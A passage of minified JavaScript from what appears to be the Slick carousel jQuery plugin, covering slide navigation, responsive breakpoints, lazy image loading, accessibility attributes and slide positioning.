c=t*n+(e*a.options.slidesPerRow+i);l.get(c)&&d.appendChild(l.get(c))}r.appendChild(d)}s.appendChild(r)}a.$slider.empty().append(s),a.$slider.children().children().children().css({width:100/a.options.slidesPerRow+"%",display:"inline-block"})}},i.prototype.checkResponsive=function(e,i){var s,o,l,n=this,a=!1,r=n.$slider.width(),d=window.innerWidth||t(window).width();if("window"===n.respondTo?l=d:"slider"===n.respondTo?l=r:"min"===n.respondTo&&(l=Math.min(d,r)),n.options.responsive&&n.options.responsive.length&&null!==n.options.responsive){for(s in o=null,n.breakpoints)n.breakpoints.hasOwnProperty(s)&&(!1===n.originalSettings.mobileFirst?l<n.breakpoints[s]&&(o=n.breakpoints[s]):l>n.breakpoints[s]&&(o=n.breakpoints[s]));null!==o?null!==n.activeBreakpoint?(o!==n.activeBreakpoint||i)&&(n.activeBreakpoint=o,"unslick"===n.breakpointSettings[o]?n.unslick(o):(n.options=t.extend({},n.originalSettings,n.breakpointSettings[o]),!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e)),a=o):(n.activeBreakpoint=o,"unslick"===n.breakpointSettings[o]?n.unslick(o):(n.options=t.extend({},n.originalSettings,n.breakpointSettings[o]),!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e)),a=o):null!==n.activeBreakpoint&&(n.activeBreakpoint=null,n.options=n.originalSettings,!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e),a=o),e||!1===a||n.$slider.trigger("breakpoint",[n,a])}},i.prototype.changeSlide=function(e,i){var s,o,l=this,n=t(e.currentTarget);switch(n.is("a")&&e.preventDefault(),n.is("li")||(n=n.closest("li")),s=l.slideCount%l.options.slidesToScroll!=0?0:(l.slideCount-l.currentSlide)%l.options.slidesToScroll,e.data.message){case"previous":o=0===s?l.options.slidesToScroll:l.options.slidesToShow-s,l.slideCount>l.options.slidesToShow&&l.slideHandler(l.currentSlide-o,!1,i);break;case"next":o=0===s?l.options.slidesToScroll:s,l.slideCount>l.options.slidesToShow&&l.slideHandler(l.currentSlide+o,!1,i);break;case"index":var a=0===e.data.index?0:e.data.index||n.index()*l.options.slidesToScroll;l.slideHandler(l.checkNavigable(a),!1,i),n.children().trigger("focus");break;default:return}},i.prototype.checkNavigable=function(t){var e,i;if(i=0,t>(e=this.getNavigableIndexes())[e.length-1])t=e[e.length-1];else for(var s in e){if(t<e[s]){t=i;break}i=e[s]}return t},i.prototype.cleanUpEvents=function(){var e=this;e.options.dots&&null!==e.$dots&&(t("li",e.$dots).off("click.slick",e.changeSlide).off("mouseenter.slick",t.proxy(e.interrupt,e,!0)).off("mouseleave.slick",t.proxy(e.interrupt,e,!1)),!0===e.options.accessibility&&e.$dots.off("keydown.slick",e.keyHandler)),e.$slider.off("focus.slick blur.slick"),!0===e.options.arrows&&e.slideCount>e.options.slidesToShow&&(e.$prevArrow&&e.$prevArrow.off("click.slick",e.changeSlide),e.$nextArrow&&e.$nextArrow.off("click.slick",e.changeSlide),!0===e.options.accessibility&&(e.$prevArrow&&e.$prevArrow.off("keydown.slick",e.keyHandler),e.$nextArrow&&e.$nextArrow.off("keydown.slick",e.keyHandler))),e.$list.off("touchstart.slick mousedown.slick",e.swipeHandler),e.$list.off("touchmove.slick mousemove.slick",e.swipeHandler),e.$list.off("touchend.slick mouseup.slick",e.swipeHandler),e.$list.off("touchcancel.slick mouseleave.slick",e.swipeHandler),e.$list.off("click.slick",e.clickHandler),t(document).off(e.visibilityChange,e.visibility),e.cleanUpSlideEvents(),!0===e.options.accessibility&&e.$list.off("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().off("click.slick",e.selectHandler),t(window).off("orientationchange.slick.slick-"+e.instanceUid,e.orientationChange),t(window).off("resize.slick.slick-"+e.instanceUid,e.resize),t("[draggable!=true]",e.$slideTrack).off("dragstart",e.preventDefault),t(window).off("load.slick.slick-"+e.instanceUid,e.setPosition)},i.prototype.cleanUpSlideEvents=function(){var e=this;e.$list.off("mouseenter.slick",t.proxy(e.interrupt,e,!0)),e.$list.off("mouseleave.slick",t.proxy(e.interrupt,e,!1))},i.prototype.cleanUpRows=function(){var t,e=this;e.options.rows>0&&((t=e.$slides.children().children()).removeAttr("style"),e.$slider.empty().append(t))},i.prototype.clickHandler=function(t){!1===this.shouldClick&&(t.stopImmediatePropagation(),t.stopPropagation(),t.preventDefault())},i.prototype.destroy=function(e){var i=this;i.autoPlayClear(),i.touchObject={},i.cleanUpEvents(),t(".slick-cloned",i.$slider).detach(),i.$dots&&i.$dots.remove(),i.$prevArrow&&i.$prevArrow.length&&(i.$prevArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.prevArrow)&&i.$prevArrow.remove()),i.$nextArrow&&i.$nextArrow.length&&(i.$nextArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.nextArrow)&&i.$nextArrow.remove()),i.$slides&&(i.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each((function(){t(this).attr("style",t(this).data("originalStyling"))})),i.$slideTrack.children(this.options.slide).detach(),i.$slideTrack.detach(),i.$list.detach(),i.$slider.append(i.$slides)),i.cleanUpRows(),i.$slider.removeClass("slick-slider"),i.$slider.removeClass("slick-initialized"),i.$slider.removeClass("slick-dotted"),i.unslicked=!0,e||i.$slider.trigger("destroy",[i])},i.prototype.disableTransition=function(t){var e=this,i={};i[e.transitionType]="",!1===e.options.fade?e.$slideTrack.css(i):e.$slides.eq(t).css(i)},i.prototype.fadeSlide=function(t,e){var i=this;!1===i.cssTransitions?(i.$slides.eq(t).css({zIndex:i.options.zIndex}),i.$slides.eq(t).animate({opacity:1},i.options.speed,i.options.easing,e)):(i.applyTransition(t),i.$slides.eq(t).css({opacity:1,zIndex:i.options.zIndex}),e&&setTimeout((function(){i.disableTransition(t),e.call()}),i.options.speed))},i.prototype.fadeSlideOut=function(t){var e=this;!1===e.cssTransitions?e.$slides.eq(t).animate({opacity:0,zIndex:e.options.zIndex-2},e.options.speed,e.options.easing):(e.applyTransition(t),e.$slides.eq(t).css({opacity:0,zIndex:e.options.zIndex-2}))},i.prototype.filterSlides=i.prototype.slickFilter=function(t){var e=this;null!==t&&(e.$slidesCache=e.$slides,e.unload(),e.$slideTrack.children(this.options.slide).detach(),e.$slidesCache.filter(t).appendTo(e.$slideTrack),e.reinit())},i.prototype.focusHandler=function(){var e=this;e.$slider.off("focus.slick blur.slick").on("focus.slick","*",(function(i){var s=t(this);setTimeout((function(){e.options.pauseOnFocus&&s.is(":focus")&&(e.focussed=!0,e.autoPlay())}),0)})).on("blur.slick","*",(function(i){t(this);e.options.pauseOnFocus&&(e.focussed=!1,e.autoPlay())}))},i.prototype.getCurrent=i.prototype.slickCurrentSlide=function(){return this.currentSlide},i.prototype.getDotCount=function(){var t=this,e=0,i=0,s=0;if(!0===t.options.infinite)if(t.slideCount<=t.options.slidesToShow)++s;else for(;e<t.slideCount;)++s,e=i+t.options.slidesToScroll,i+=t.options.slidesToScroll<=t.options.slidesToShow?t.options.slidesToScroll:t.options.slidesToShow;else if(!0===t.options.centerMode)s=t.slideCount;else if(t.options.asNavFor)for(;e<t.slideCount;)++s,e=i+t.options.slidesToScroll,i+=t.options.slidesToScroll<=t.options.slidesToShow?t.options.slidesToScroll:t.options.slidesToShow;else s=1+Math.ceil((t.slideCount-t.options.slidesToShow)/t.options.slidesToScroll);return s-1},i.prototype.getLeft=function(t){var e,i,s,o,l=this,n=0;return l.slideOffset=0,i=l.$slides.first().outerHeight(!0),!0===l.options.infinite?(l.slideCount>l.options.slidesToShow&&(l.slideOffset=l.slideWidth*l.options.slidesToShow*-1,o=-1,!0===l.options.vertical&&!0===l.options.centerMode&&(2===l.options.slidesToShow?o=-1.5:1===l.options.slidesToShow&&(o=-2)),n=i*l.options.slidesToShow*o),l.slideCount%l.options.slidesToScroll!=0&&t+l.options.slidesToScroll>l.slideCount&&l.slideCount>l.options.slidesToShow&&(t>l.slideCount?(l.slideOffset=(l.options.slidesToShow-(t-l.slideCount))*l.slideWidth*-1,n=(l.options.slidesToShow-(t-l.slideCount))*i*-1):(l.slideOffset=l.slideCount%l.options.slidesToScroll*l.slideWidth*-1,n=l.slideCount%l.options.slidesToScroll*i*-1))):t+l.options.slidesToShow>l.slideCount&&(l.slideOffset=(t+l.options.slidesToShow-l.slideCount)*l.slideWidth,n=(t+l.options.slidesToShow-l.slideCount)*i),l.slideCount<=l.options.slidesToShow&&(l.slideOffset=0,n=0),!0===l.options.centerMode&&l.slideCount<=l.options.slidesToShow?l.slideOffset=l.slideWidth*Math.floor(l.options.slidesToShow)/2-l.slideWidth*l.slideCount/2:!0===l.options.centerMode&&!0===l.options.infinite?l.slideOffset+=l.slideWidth*Math.floor(l.options.slidesToShow/2)-l.slideWidth:!0===l.options.centerMode&&(l.slideOffset=0,l.slideOffset+=l.slideWidth*Math.floor(l.options.slidesToShow/2)),e=!1===l.options.vertical?t*l.slideWidth*-1+l.slideOffset:t*i*-1+n,!0===l.options.variableWidth&&(s=l.slideCount<=l.options.slidesToShow||!1===l.options.infinite?l.$slideTrack.children(".slick-slide").eq(t):l.$slideTrack.children(".slick-slide").eq(t+l.options.slidesToShow),e=!0===l.options.rtl?s[0]?-1*(l.$slideTrack.width()-s[0].offsetLeft-s.width()):0:s[0]?-1*s[0].offsetLeft:0,!0===l.options.centerMode&&(s=l.slideCount<=l.options.slidesToShow||!1===l.options.infinite?l.$slideTrack.children(".slick-slide").eq(t):l.$slideTrack.children(".slick-slide").eq(t+l.options.slidesToShow+1),e=!0===l.options.rtl?s[0]?-1*(l.$slideTrack.width()-s[0].offsetLeft-s.width()):0:s[0]?-1*s[0].offsetLeft:0,e+=(l.$list.width()-s.outerWidth())/2)),e},i.prototype.getOption=i.prototype.slickGetOption=function(t){return this.options[t]},i.prototype.getNavigableIndexes=function(){var t,e=this,i=0,s=0,o=[];for(!1===e.options.infinite?t=e.slideCount:(i=-1*e.options.slidesToScroll,s=-1*e.options.slidesToScroll,t=2*e.slideCount);i<t;)o.push(i),i=s+e.options.slidesToScroll,s+=e.options.slidesToScroll<=e.options.slidesToShow?e.options.slidesToScroll:e.options.slidesToShow;return o},i.prototype.getSlick=function(){return this},i.prototype.getSlideCount=function(){var e,i,s,o=this;return s=!0===o.options.centerMode?Math.floor(o.$list.width()/2):0,i=-1*o.swipeLeft+s,!0===o.options.swipeToSlide?(o.$slideTrack.find(".slick-slide").each((function(s,l){var n,a;if(n=t(l).outerWidth(),a=l.offsetLeft,!0!==o.options.centerMode&&(a+=n/2),i<a+n)return e=l,!1})),Math.abs(t(e).attr("data-slick-index")-o.currentSlide)||1):o.options.slidesToScroll},i.prototype.goTo=i.prototype.slickGoTo=function(t,e){this.changeSlide({data:{message:"index",index:parseInt(t)}},e)},i.prototype.init=function(e){var i=this;t(i.$slider).hasClass("slick-initialized")||(t(i.$slider).addClass("slick-initialized"),i.buildRows(),i.buildOut(),i.setProps(),i.startLoad(),i.loadSlider(),i.initializeEvents(),i.updateArrows(),i.updateDots(),i.checkResponsive(!0),i.focusHandler()),e&&i.$slider.trigger("init",[i]),!0===i.options.accessibility&&i.initADA(),i.options.autoplay&&(i.paused=!1,i.autoPlay())},i.prototype.initADA=function(){var e=this,i=Math.ceil(e.slideCount/e.options.slidesToShow),s=e.getNavigableIndexes().filter((function(t){return t>=0&&t<e.slideCount}));e.$slides.add(e.$slideTrack.find(".slick-cloned")).attr({"aria-hidden":"true",tabindex:"-1"}).find("a, input, button, select").attr({tabindex:"-1"}),null!==e.$dots&&(e.$slides.not(e.$slideTrack.find(".slick-cloned")).each((function(i){var o=s.indexOf(i);if(t(this).attr({role:"tabpanel",id:"slick-slide"+e.instanceUid+i,tabindex:-1}),-1!==o){var l="slick-slide-control"+e.instanceUid+o;t("#"+l).length&&t(this).attr({"aria-describedby":l})}})),e.$dots.attr("role","tablist").find("li").each((function(o){var l=s[o];t(this).attr({role:"presentation"}),t(this).find("button").first().attr({role:"tab",id:"slick-slide-control"+e.instanceUid+o,"aria-controls":"slick-slide"+e.instanceUid+l,"aria-label":o+1+" of "+i,"aria-selected":null,tabindex:"-1"})})).eq(e.currentSlide).find("button").attr({"aria-selected":"true",tabindex:"0"}).end());for(var o=e.currentSlide,l=o+e.options.slidesToShow;o<l;o++)e.options.focusOnChange?e.$slides.eq(o).attr({tabindex:"0"}):e.$slides.eq(o).removeAttr("tabindex");e.activateADA()},i.prototype.initArrowEvents=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.off("click.slick").on("click.slick",{message:"previous"},t.changeSlide),t.$nextArrow.off("click.slick").on("click.slick",{message:"next"},t.changeSlide),!0===t.options.accessibility&&(t.$prevArrow.on("keydown.slick",t.keyHandler),t.$nextArrow.on("keydown.slick",t.keyHandler)))},i.prototype.initDotEvents=function(){var e=this;!0===e.options.dots&&e.slideCount>e.options.slidesToShow&&(t("li",e.$dots).on("click.slick",{message:"index"},e.changeSlide),!0===e.options.accessibility&&e.$dots.on("keydown.slick",e.keyHandler)),!0===e.options.dots&&!0===e.options.pauseOnDotsHover&&e.slideCount>e.options.slidesToShow&&t("li",e.$dots).on("mouseenter.slick",t.proxy(e.interrupt,e,!0)).on("mouseleave.slick",t.proxy(e.interrupt,e,!1))},i.prototype.initSlideEvents=function(){var e=this;e.options.pauseOnHover&&(e.$list.on("mouseenter.slick",t.proxy(e.interrupt,e,!0)),e.$list.on("mouseleave.slick",t.proxy(e.interrupt,e,!1)))},i.prototype.initializeEvents=function(){var e=this;e.initArrowEvents(),e.initDotEvents(),e.initSlideEvents(),e.$list.on("touchstart.slick mousedown.slick",{action:"start"},e.swipeHandler),e.$list.on("touchmove.slick mousemove.slick",{action:"move"},e.swipeHandler),e.$list.on("touchend.slick mouseup.slick",{action:"end"},e.swipeHandler),e.$list.on("touchcancel.slick mouseleave.slick",{action:"end"},e.swipeHandler),e.$list.on("click.slick",e.clickHandler),t(document).on(e.visibilityChange,t.proxy(e.visibility,e)),!0===e.options.accessibility&&e.$list.on("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().on("click.slick",e.selectHandler),t(window).on("orientationchange.slick.slick-"+e.instanceUid,t.proxy(e.orientationChange,e)),t(window).on("resize.slick.slick-"+e.instanceUid,t.proxy(e.resize,e)),t("[draggable!=true]",e.$slideTrack).on("dragstart",e.preventDefault),t(window).on("load.slick.slick-"+e.instanceUid,e.setPosition),t(e.setPosition)},i.prototype.initUI=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.show(),t.$nextArrow.show()),!0===t.options.dots&&t.slideCount>t.options.slidesToShow&&t.$dots.show()},i.prototype.keyHandler=function(t){var e=this;t.target.tagName.match("TEXTAREA|INPUT|SELECT")||(37===t.keyCode&&!0===e.options.accessibility?e.changeSlide({data:{message:!0===e.options.rtl?"next":"previous"}}):39===t.keyCode&&!0===e.options.accessibility&&e.changeSlide({data:{message:!0===e.options.rtl?"previous":"next"}}))},i.prototype.lazyLoad=function(){var e,i,s,o=this;function l(e){t("img[data-lazy]",e).each((function(){var e=t(this),i=t(this).attr("data-lazy"),s=t(this).attr("data-srcset"),l=t(this).attr("data-sizes")||o.$slider.attr("data-sizes"),n=document.createElement("img");n.onload=function(){e.animate({opacity:0},100,(function(){s&&(e.attr("srcset",s),l&&e.attr("sizes",l)),e.attr("src",i).animate({opacity:1},200,(function(){e.removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading")})),o.$slider.trigger("lazyLoaded",[o,e,i])}))},n.onerror=function(){e.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),o.$slider.trigger("lazyLoadError",[o,e,i])},n.src=i}))}if(!0===o.options.centerMode?!0===o.options.infinite?s=(i=o.currentSlide+(o.options.slidesToShow/2+1))+o.options.slidesToShow+2:(i=Math.max(0,o.currentSlide-(o.options.slidesToShow/2+1)),s=o.options.slidesToShow/2+1+2+o.currentSlide):(i=o.options.infinite?o.options.slidesToShow+o.currentSlide:o.currentSlide,s=Math.ceil(i+o.options.slidesToShow),!0===o.options.fade&&(i>0&&i--,s<=o.slideCount&&s++)),e=o.$slider.find(".slick-slide").slice(i,s),"anticipated"===o.options.lazyLoad)for(var n=i-1,a=s,r=o.$slider.find(".slick-slide"),d=0;d<o.options.slidesToScroll;d++)n<0&&(n=o.slideCount-1),e=(e=e.add(r.eq(n))).add(r.eq(a)),n--,a++;l(e),o.slideCount<=o.options.slidesToShow?l(o.$slider.find(".slick-slide")):o.currentSlide>=o.slideCount-o.options.slidesToShow?l(o.$slider.find(".slick-cloned").slice(0,o.options.slidesToShow)):0===o.currentSlide&&l(o.$slider.find(".slick-cloned").slice(-1*o.options.slidesToShow))},i.prototype.loadSlider=function(){var t=this;t.setPosition(),t.$slideTrack.css({opacity:1}),t.$slider.removeClass("slick-loading"),t.initUI(),"progressive"===t.options.lazyLoad&&t.progressiveLazyLoad()},i.prototype.next=i.prototype.slickNext=function(){this.changeSlide({data:{message:"next"}})},i.prototype.orientationChange=function(){this.checkResponsive(),this.setPosition()},i.prototype.pause=i.prototype.slickPause=function(){this.autoPlayClear(),this.paused=!0},i.prototype.play=i.prototype.slickPlay=function(){var t=this;t.autoPlay(),t.options.autoplay=!0,t.paused=!1,t.focussed=!1,t.interrupted=!1},i.prototype.postSlide=function(e){var i=this;i.unslicked||(i.$slider.trigger("afterChange",[i,e]),i.animating=!1,i.slideCount>i.options.slidesToShow&&i.setPosition(),i.swipeLeft=null,i.options.autoplay&&i.autoPlay(),!0===i.options.accessibility&&(i.initADA(),i.options.focusOnChange&&t(i.$slides.get(i.currentSlide)).attr("tabindex",0).focus()))},i.prototype.prev=i.prototype.slickPrev=function(){this.changeSlide({data:{message:"previous"}})},i.prototype.preventDefault=function(t){t.preventDefault()},i.prototype.progressiveLazyLoad=function(e){e=e||1;var i,s,o,l,n,a=this,r=t("img[data-lazy]",a.$slider);r.length?(i=r.first(),s=i.attr("data-lazy"),o=i.attr("data-srcset"),l=i.attr("data-sizes")||a.$slider.attr("data-sizes"),(n=document.createElement("img")).onload=function(){o&&(i.attr("srcset",o),l&&i.attr("sizes",l)),i.attr("src",s).removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading"),!0===a.options.adaptiveHeight&&a.setPosition(),a.$slider.trigger("lazyLoaded",[a,i,s]),a.progressiveLazyLoad()},n.onerror=function(){e<3?setTimeout((function(){a.progressiveLazyLoad(e+1)}),500):(i.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),a.$slider.trigger("lazyLoadError",[a,i,s]),a.progressiveLazyLoad())},n.src=s):a.$slider.trigger("allImagesLoaded",[a])},i.prototype.refresh=function(e){var i,s,o=this;s=o.slideCount-o.options.slidesToShow,!o.options.infinite&&o.currentSlide>s&&(o.currentSlide=s),o.slideCount<=o.options.slidesToShow&&(o.currentSlide=0),i=o.currentSlide,o.destroy(!0),t.extend(o,o.initials,{currentSlide:i}),o.init(),e||o.changeSlide({data:{message:"index",index:i}},!1)},i.prototype.registerBreakpoints=function(){var e,i,s,o=this,l=o.options.responsive||null;if("array"===t.type(l)&&l.length){for(e in o.respondTo=o.options.respondTo||"window",l)if(s=o.breakpoints.length-1,l.hasOwnProperty(e)){for(i=l[e].breakpoint;s>=0;)o.breakpoints[s]&&o.breakpoints[s]===i&&o.breakpoints.splice(s,1),s--;o.breakpoints.push(i),o.breakpointSettings[i]=l[e].settings}o.breakpoints.sort((function(t,e){return o.options.mobileFirst?t-e:e-t}))}},i.prototype.reinit=function(){var e=this;e.$slides=e.$slideTrack.children(e.options.slide).addClass("slick-slide"),e.slideCount=e.$slides.length,e.currentSlide>=e.slideCount&&0!==e.currentSlide&&(e.currentSlide=e.currentSlide-e.options.slidesToScroll),e.slideCount<=e.options.slidesToShow&&(e.currentSlide=0),e.registerBreakpoints(),e.setProps(),e.setupInfinite(),e.buildArrows(),e.updateArrows(),e.initArrowEvents(),e.buildDots(),e.updateDots(),e.initDotEvents(),e.cleanUpSlideEvents(),e.initSlideEvents(),e.checkResponsive(!1,!0),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().on("click.slick",e.selectHandler),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),e.setPosition(),e.focusHandler(),e.paused=!e.options.autoplay,e.autoPlay(),e.$slider.trigger("reInit",[e])},i.prototype.resize=function(){var e=this;t(window).width()!==e.windowWidth&&(clearTimeout(e.windowDelay),e.windowDelay=window.setTimeout((function(){e.windowWidth=t(window).width(),e.checkResponsive(),e.unslicked||e.setPosition()}),50))},i.prototype.removeSlide=i.prototype.slickRemove=function(t,e,i){var s=this;if(t="boolean"==typeof t?!0===(e=t)?0:s.slideCount-1:!0===e?--t:t,s.slideCount<1||t<0||t>s.slideCount-1)return!1;s.unload(),!0===i?s.$slideTrack.children().remove():s.$slideTrack.children(this.options.slide).eq(t).remove(),s.$slides=s.$slideTrack.children(this.options.slide),s.$slideTrack.children(this.options.slide).detach(),s.$slideTrack.append(s.$slides),s.$slidesCache=s.$slides,s.reinit()},i.prototype.setCSS=function(t){var e,i,s=this,o={};!0===s.options.rtl&&(t=-t),e="left"==s.positionProp?Math.ceil(t)+"px":"0px",i="top"==s.positionProp?Math.ceil(t)+"px":"0px",o[s.positionProp]=t,!1===s.transformsEnabled?s.$slideTrack.css(o):(o={},!1===s.cssTransitions?(o[s.animType]="translate("+e+", "+i+")",s.$slideTrack.css(o)):(o[s.animType]="translate3d("+e+", "+i+", 0px)",s.$slideTrack.css(o)))},i.prototype.setDimensions=function(){var t=this;!1===t.options.vertical?!0===t.options.centerMode&&t.$list.css({padding:"0px "+t.options.centerPadding}):(t.$list.height(t.$slides.first().outerHeight(!0)*t.options.slidesToShow),!0===t.options.centerMode&&t.$list.css({padding:t.options.centerPadding+" 0px"})),t.listWidth=t.$list.width(),t.listHeight=t.$list.height(),!1===t.options.vertical&&!1===t.options.variableWidth?(t.slideWidth=Math.ceil(t.listWidth/t.options.slidesToShow),t.$slideTrack.width(Math.ceil(t.slideWidth*t.$slideTrack.children(".slick-slide").length))):!0===t.options.variableWidth?t.$slideTrack.width(5e3*t.slideCount):(t.slideWidth=Math.ceil(t.listWidth),t.$slideTrack.height(Math.ceil(t.$slides.first().outerHeight(!0)*t.$slideTrack.children(".slick-slide").length)));var e=t.$slides.first().outerWidth(!0)-t.$slides.first().width();!1===t.options.variableWidth&&t.$slideTrack.children(".slick-slide").width(t.slideWidth-e)},i.prototype.setFade=function(){var e,i=this;i.$slides.each((function(s,o){e=i.slideWidth*s*-1,!0===i.options.rtl?t(o).css({position:"relative",right:e,top:0,zIndex:i.options.zIndex-2,opacity:0}):t(o).css({position:"relative",left:e,top:0,zIndex:i.options.zIndex-2,opacity:0})})),i.$slides.eq(i.currentSlide).css({zIndex:i.options.zIndex-1,opacity:1})},i.prototype.setHeight=function(){var t=this;if(1===t.options.slidesToShow&&!0===t.options.adaptiveHeight&&!1===t.options.vertical){var e=t.$slides.eq(t.currentSlide).outerHeight(!0);t.$list.css("height",e)}},i.prototype.setOption=i.prototype.slickSetOption=function(){var e,i,s,o,l,n=this,a=!1;if("object"===t.type(arguments[0])?(s=arguments[0],a=arguments[1],l="multiple"):"string"===t.type(arguments[0])&&(s=arguments[0],o=arguments[1],a=arguments[2],"responsive"===arguments[0]&&"array"===t.type(arguments[1])?l="responsive":void 0!==arguments[1]&&(l="single")),"single"===l)n.options[s]=o;else if("multiple"===l)t.each(s,(function(t,e){n.options[t]=e}));else if("responsive"===l)for(i in o)if("array"!==t.type(n.options.responsive))n.options.responsive=[o[i]];else{for(e=n.options.responsive.length-1;e>=0;)n.options.responsive[e].breakpoint===o[i].breakpoint&&n.options.responsive.splice(e,1),e--;n.options.responsive.push(o[i])}a&&(n.unload(),n.reinit())},i.prototype.setPosition=function(){var t=this;t.setDimensions(),t.setHeight(),!1===t.options.fade?t.setCSS(t.getLeft(t.currentSlide)):t.setFade(),t.$slider.trigger("setPosition",[t])},i.prototype.setProps=function(){var t=this,e=document.body.style;t.positionProp=!0===t.options.vertical?"top":"left","top"===t.positionProp?t.$slider.addClass("slick-vertical"):t.$slider.removeClass("slick-vertical"),void 0===e.WebkitTransition&&void 0===e.MozTransition&&void 0===e.msTransition||!0===t.options.useCSS&&(t.cssTransitions=!0),t.options.fade&&("number"==typeof t.options.zIndex?t.options.zIndex<3&&(t.options.zIndex=3):t.options.zIndex=t.defaults.zIndex),void 0!==e.OTransform&&(t.animType="OTransform",t.transformType="-o-transform",t.transitionType="OTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(t.animType=!1)),void 0!==e.MozTransform&&(t.animType="MozTransform",t.transformType="-moz-transform",t.transitionType="MozTransition",void 0===e.perspectiveProperty&&void 0===e.MozPerspective&&(t.animType=!1)),void 0!==e.webkitTransform&&(t.animType="webkitTransform",t.transformType="-webkit-transform",t.transitionType="webkitTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(t.animType=!1)),void 0!==e.msTransform&&(t.animType="msTransform",t.transformType="-ms-transform",t.transitionType="msTransition",void 0===e.msTransform&&(t.animType=!1)),void 0!==e.transform&&!1!==t.animType&&(t.animType="transform",t.transformType="transform",t.transitionType="transition"),t.transformsEnabled=t.options.useTransform&&null!==t.animType&&!1!==t.animType},i.prototype.setSlideClasses=function(t){var e,i,s,o,l=this;if(i=l.$slider.find(".slick-slide").removeClass("slick-active slick-center slick-current").attr("aria-hidden","true"),l.$slides.eq(t).addClass("slick-current"),!0===l.options.centerMode){var n=l.options.slidesToShow%2==0?1:0;e=Math.floor(l.options.slidesToShow/2),!0===l.options.infinite&&(t>=e&&t<=l.slideCount-1-e?l.$slides.slice(t-e+n,t+e+1).addClass("slick-active").attr("aria-hidden","false"):(s=l.options.slidesToShow+t,i.slice(s-e+1+n,s+e+2).addClass("slick-active").attr("aria-hidden","false")),0===t?i.eq(l.options.slidesToShow+l.slideCount+1).addClass("slick-center"):t===l.slideCount-1&&i.eq(l.options.slidesToShow).addClass("slick-center")),l.$slides.eq(t).addClass("slick-center")}else t>=0&&t<=l.slideCount-l.options.slidesToShow?l.$slides.slice(t,t+l.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"):i.length<=l.options.slidesToShow?i.addClass("slick-active").attr("aria-hidden","false"):(o=l.slideCount%l.options.slidesToShow,s=!0===l.options.infinite?l.options.slidesToShow+t:t,l.options.slidesToShow==l.options.slidesToScroll&&l.slideCount-t<l.options.slidesToShow?i.slice(s-(l.options.slidesToShow-o),s+o).addClass("slick-active").attr("aria-hidden","false"):i.slice(s,s+l.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"));"ondemand"!==l.options.lazyLoad&&"anticipated"!==l.options.lazyLoad||l.lazyLoad()},i.prototype.setupInfinite=function(){var e,i,s,o=this;if(!0===o.options.fade&&(o.options.centerMode=!1),!0===o.options.infinite&&!1===o.options.fade&&(i=null,o.slideCount>o.options.slidesToShow)){for(s=!0===o.options.centerMode?o.options.slidesToShow+1:o.options.slidesToShow,e=o.slideCount;e>o.slideCount-s;e-=1)i=e-1,t(o.$slides[i]).clone(!0).attr("id","").attr("data-slick-index",i-o.slideCount).prependTo(o.$slideTrack).addClass("slick-cloned");for(e=0;e<s+o.slideCount;e+=1)i=e,t(o.$slides[i]).clone(!0).attr("id","").attr("data-slick-index",i+o.slideCount).appendTo(o.$slideTrack).addClass("slick-cloned");o.$slideTrack.find(".slick-cloned").find("[id]").each((function(){t(this).attr("id","")}))}},i.prototype.interrupt=function(t){t||this.autoPlay(),this.interrupted=t},i.prototype.selectHandler=function(e){var i=this,s=t(e.target).is(".slick-slide")?t(e.target):t(e.target).parents(".slick-slide"),o=parseInt(s.attr("data-slick-index"));o||(o=0),i.slideCount<=i.options.slidesToShow?i.slideHandler(o,!1,!0):i.slideHandler(o)},i.prototype.slideHandler=function(t,e,i){var s,o,l,n,a,r,d=this;if(e=e||!1,!(!0===d.animating&&!0===d.options.waitForAnimate||!0===d.options.fade&&d.currentSlide===t))if(!1===e&&d.asNavFor(t),s=t,a=d.getLeft(s),n=d.getLeft(d.currentSlide),d.currentLeft=null===d.swipeLeft?n:d.swipeLeft,!1===d.options.infinite&&!1===d.options.centerMode&&(t<0||t>d.getDotCount()*d.options.slidesToScroll))!1===d.options.fade&&(s=d.currentSlide,!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(n,(function(){d.postSlide(s)})):d.postSlide(s));else if(!1===d.options.infinite&&!0===d.options.centerMode&&(t<0||t>d.slideCount-d.options.slidesToScroll))!1===d.options.fade&&(s=d.currentSlide,!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(n,(function(){d.postSlide(s)})):d.postSlide(s));else{if(d.options.autoplay&&clearInterval(d.autoPlayTimer),o=s<0?d.slideCount%d.options.slidesToScroll!=0?d.slideCount-d.slideCount%d.options.slidesToScroll:d.slideCount+s:s>=d.slideCount?d.slideCount%d.options.slidesToScroll!=0?0:s-d.slideCount:s,d.animating=!0,d.$slider.trigger("beforeChange",[d,d.currentSlide,o]),l=d.currentSlide,d.currentSlide=o,d.setSlideClasses(d.currentSlide),d.options.asNavFor&&(r=(r=d.getNavTarget()).slick("getSlick")).slideCount<=r.options.slidesToShow&&r.setSlideClasses(d.currentSlide),d.updateDots(),d.updateArrows(),!0===d.options.fade)return!0!==i?(d.fadeSlideOut(l),d.fadeSlide(o,(function(){d.postSlide(o)}))):d.postSlide(o),void 